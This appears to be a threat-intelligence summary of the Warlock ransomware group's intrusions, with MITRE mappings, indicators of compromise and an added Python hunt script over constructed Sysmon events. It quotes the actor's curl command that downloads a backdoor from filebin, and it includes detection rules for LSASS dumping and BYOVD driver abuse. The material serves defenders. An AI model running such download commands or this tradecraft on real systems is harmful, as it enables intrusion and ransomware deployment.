CTU researchers track a threat group calling itself Warlock Group (GOLD SALEM) that has been compromising networks and deploying Warlock ransomware since March 2025, leveraging exploits against enterprise applications, BYOVD with a vulnerable Baidu driver, credential theft, and legitimate DFIR tooling abuse. The group operates a Tor leak site, solicited exploits and access on underground forums, and has a varied victimology across the Americas and Europe while largely avoiding targets in China and Russia. #Warlock #GOLD_SALEM #ToolShell
Keypoints
- GOLD SALEM (self-styled Warlock Group) has deployed Warlock ransomware against at least 60 victims since March 2025 across North America, Europe, and South America.
- The group advertised on RAMP forum seeking exploits (Veeam, ESXi, SharePoint) and cooperation from initial access brokers, indicating RaaS or affiliate recruitment activity.
- Initial access observed via the ToolShell SharePoint exploit chain (multiple CVEs) that installed an ASPX web shell and downloaded a Golang-based WebSockets backdoor.
- GOLD SALEM used Bring Your Own Vulnerable Driver (BYOVD) with a flawed Baidu Antivirus driver (CVE-2024-51324) renamed to kill EDR processes.
- Post-exploitation activity included Mimikatz targeting LSASS, PsExec and Impacket for lateral movement, GPOs for payload deployment, and abuse of Velociraptor to create VS Code tunnels.
- The group runs a Tor-based dedicated leak site (DLS), publishes victims in batches, claims to have sold victim data, and assigns countdown ransom deadlines of ~12–14 days.
- CTU recommends aggressive patching, attack surface monitoring, proactive endpoint detection, and using the listed indicators to detect and block related activity.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used ToolShell exploit chain against SharePoint servers via CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 to place an ASPX web shell (“…exploitation resulted in the placement of an ASPX web shell…”).
- [T1505.003] Server Software Component: Web Shell – Deployment of an ASPX web shell that executes inside the IIS worker process (w3wp.exe) to run commands and retrieve their output (“…created a Process object for cmd.exe within the context of the IIS worker process (w3wp.exe)…”); a w3wp.exe parent spawning cmd.exe is the detection hook.
- [T1105] Ingress Tool Transfer – Downloaded a Golang-based WebSockets server via curl to maintain remote access, saving a payload served as a .txt file under an executable name in a world-writable directory (“curl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/…/wsocks.exe.txt”).
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Use of PsExec and Impacket for lateral movement within the environment (“Microsoft also observed the use of PsExec and Impacket for lateral movement…”); both operate over SMB admin shares and remote service creation rather than proxying execution through a signed system binary.
- [T1068] Exploitation for Privilege Escalation / [T1562.001] Impair Defenses: Disable or Modify Tools – BYOVD using a vulnerable Baidu Antivirus driver (renamed googleApiUtil64.sys) to terminate EDR agents by exploiting CVE-2024-51324 (“…used the Bring Your Own Vulnerable Driver (BYOVD) technique and a vulnerable Baidu Antivirus driver renamed googleApiUtil64.sys to terminate the EDR agent…”). Renaming does not invalidate the driver's Authenticode signature, so file-name blocklists miss it; match on file hash or on the signer/certificate instead.
- [T1003.001] OS Credential Dumping: LSASS Memory – Execution of Mimikatz targeting LSASS memory to extract plaintext credentials (“…execution of Mimikatz ‘specifically targeting the Local Security Authority Subsystem Service (LSASS) memory to extract plaintext credentials.’”).
- [T1486] Data Encrypted for Impact – Deployment of Warlock ransomware to encrypt victims and post extortion demands on a Tor-based leak site (DLS) with countdown dates for ransom payment (“…deployed its Warlock ransomware… operates a Tor-based DLS to publish purported victim names and data…”).
- [T1650] Acquire Access / [T1588.005] Obtain Capabilities: Exploits – Advertisements on the RAMP forum seeking exploits (Veeam, ESXi, SharePoint) and cooperation from initial access brokers (“The group advertised on RAMP forum seeking exploits … and cooperation from initial access brokers…”). No phishing activity is described.
- [T1657] Financial Theft – Double extortion: stolen victim data is published on the Tor DLS or sold to private buyers, with countdown ransom deadlines (“…data from 19 of 60 listed victims (32%) was published on the DLS… sold data from 27 (45%) of the victims to private buyers…”). The exfiltration channel itself is not described.
- [T1219] Remote Access Software – Abuse of the legitimate open-source Velociraptor DFIR tool to establish a VS Code tunnel for remote presence and to facilitate ransomware deployment (“…abusing the legitimate open-source Velociraptor … to establish a Visual Studio Code network tunnel…”).
Indicators of Compromise
- [File Hash – MD5/SHA1/SHA256] ASPX web shell used after SharePoint ToolShell exploitation – MD5: bfbeac96a385b1e5643ec0752b132506, SHA1: de25be0afd53a1d274eec02e5303622fc8e7dbd5, SHA256: 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1.
- [File Hash – MD5/SHA1/SHA256] WebSockets remote access tool (wsocks.exe.txt) – MD5: b3a099ecca79503a0e4a154bd85d3e6b, SHA1: 6d0cc6349a951f0b52394ad3436d1656ec5fba6a, SHA256: a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4.
- [Command/URL] Download command used during intrusion – curl command that fetched wsocks.exe.txt from filebin (curl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt).
- [Vulnerabilities] Exploited CVEs for SharePoint ToolShell chain – CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771 (used for initial access via SharePoint exploitation).
- [Driver/CVE] Vulnerable driver abused for BYOVD – Baidu Antivirus driver (renamed googleApiUtil64.sys) exploiting CVE-2024-51324 to terminate EDR processes.
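The following hunt script is an added example, not code from CTU or from the Warlock Group report; it turns the MITRE mappings and the indicators above into rules that run over constructed Sysmon-style events (process creation EID 1, driver load EID 6, process access EID 10, and any event carrying a Hashes field). The SHA256 values, the googleApiUtil64.sys name and the curl command shape come from this page; the event field layout, the Baidu signer string, the Velociraptor process name and the LSASS reader allow-list are assumptions for illustration.

```python
"""Hunt rules for the GOLD SALEM / Warlock tradecraft summarised on this page.

Added example over CONSTRUCTED Sysmon-style event dicts (not real telemetry).
Hashes and file names come from the page's IOC list; event shapes, the Baidu
signer string and the allow-list below are assumptions for illustration.
"""
import ntpath
import re

# SHA256 values taken from the Indicators of Compromise list above.
IOC_SHA256 = {
    "996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1": "ToolShell ASPX web shell",
    "a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4": "wsocks.exe.txt WebSockets backdoor",
}
RENAMED_DRIVER = "googleapiutil64.sys"          # Baidu driver name used by the actor
IIS_WORKER = "w3wp.exe"
SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
LSASS_READERS_ALLOWED = {"msmpeng.exe", "csrss.exe", "wininit.exe"}  # assumed tuning list


def _base(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def hunt(event):
    """Return a list of (rule_name, attack_id) hits for one Sysmon-style event."""
    hits = []
    eid = event.get("EventID")
    image = _base(event.get("Image"))
    cmd = event.get("CommandLine", "")

    if eid == 1:  # process creation
        parent = _base(event.get("ParentImage"))
        # Web shell: the IIS worker should never spawn an interactive shell.
        if parent == IIS_WORKER and image in SHELL_CHILDREN:
            hits.append(("iis_worker_spawned_shell", "T1505.003"))
        # Ingress tool transfer into a world-writable directory, and the
        # ".txt served as .exe" shape of the page's curl command.
        if image in DOWNLOADERS and re.search(r"\\users\\public\\", cmd, re.I):
            hits.append(("download_to_users_public", "T1105"))
        if image == "curl.exe" and re.search(r"-o\s+\S+\.exe\b.*https?://\S+\.txt", cmd, re.I):
            hits.append(("curl_txt_payload_saved_as_exe", "T1105"))
        # PsExec service binary executing on a host (lateral movement).
        if image == "psexesvc.exe":
            hits.append(("psexec_service_binary", "T1021.002"))
        # VS Code tunnel, and specifically one started by a Velociraptor agent.
        if image == "code.exe" and re.search(r"\btunnel\b", cmd, re.I):
            hits.append(("vscode_tunnel", "T1219"))
            if parent == "velociraptor.exe":  # assumed agent binary name
                hits.append(("vscode_tunnel_from_velociraptor", "T1219"))

    elif eid == 6:  # driver loaded
        drv = _base(event.get("ImageLoaded"))
        signer = event.get("Signature", "").lower()
        # Known rename from the page, or (heuristic) a Baidu-signed driver
        # loaded under a name that does not look like a Baidu product file.
        if drv == RENAMED_DRIVER or ("baidu" in signer and not drv.startswith("bd")):
            hits.append(("renamed_baidu_driver_byovd", "T1562.001"))

    elif eid == 10:  # process access
        target = _base(event.get("TargetImage"))
        src = _base(event.get("SourceImage"))
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        # PROCESS_VM_READ (0x10) on lsass.exe from an unexpected source process.
        if target == "lsass.exe" and granted & 0x10 and src not in LSASS_READERS_ALLOWED:
            hits.append(("lsass_memory_read", "T1003.001"))

    # Hash match applies to any event that carries a Sysmon Hashes field.
    m = re.search(r"SHA256=([0-9A-Fa-f]{64})", event.get("Hashes", ""))
    if m and m.group(1).lower() in IOC_SHA256:
        hits.append(("ioc_sha256:" + IOC_SHA256[m.group(1).lower()], "IOC"))
    return hits


# Constructed sample events (not real telemetry); one benign control at the end.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -L -o c:\users\public\Sophos\Sophos-UI.exe "
                    r"https://filebin.net/j7jqfnh8tn4alzsr/wsocks.exe.txt"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\Temp\googleApiUtil64.sys",
     "Signature": "Beijing Baidu Netcom Science Technology Co., Ltd.",  # assumed signer
     "Hashes": "SHA256=" + "0" * 64},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "ParentImage": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "Image": r"C:\Users\Public\code.exe",
     "CommandLine": "code.exe tunnel --accept-server-license-terms"},
    {"EventID": 15, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\inetpub\wwwroot\shell.aspx",
     "Hashes": "SHA256=996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]


def hunt_all(events):
    """Map event index -> hits for every event that triggered at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        found = hunt(ev)
        if found:
            results[i] = found
    return results


if __name__ == "__main__":
    for idx, found in hunt_all(SAMPLE_EVENTS).items():
        print(idx, found)
```

The driver rule deliberately keys on the signer rather than the file name, because the actor's rename leaves the Baidu signature intact; the `startswith("bd")` check is a heuristic and will need tuning against whatever Baidu software is legitimately present. Feed the same dict shape from real Sysmon/EDR exports and extend `IOC_SHA256` with the MD5/SHA1 values above if your telemetry only carries those.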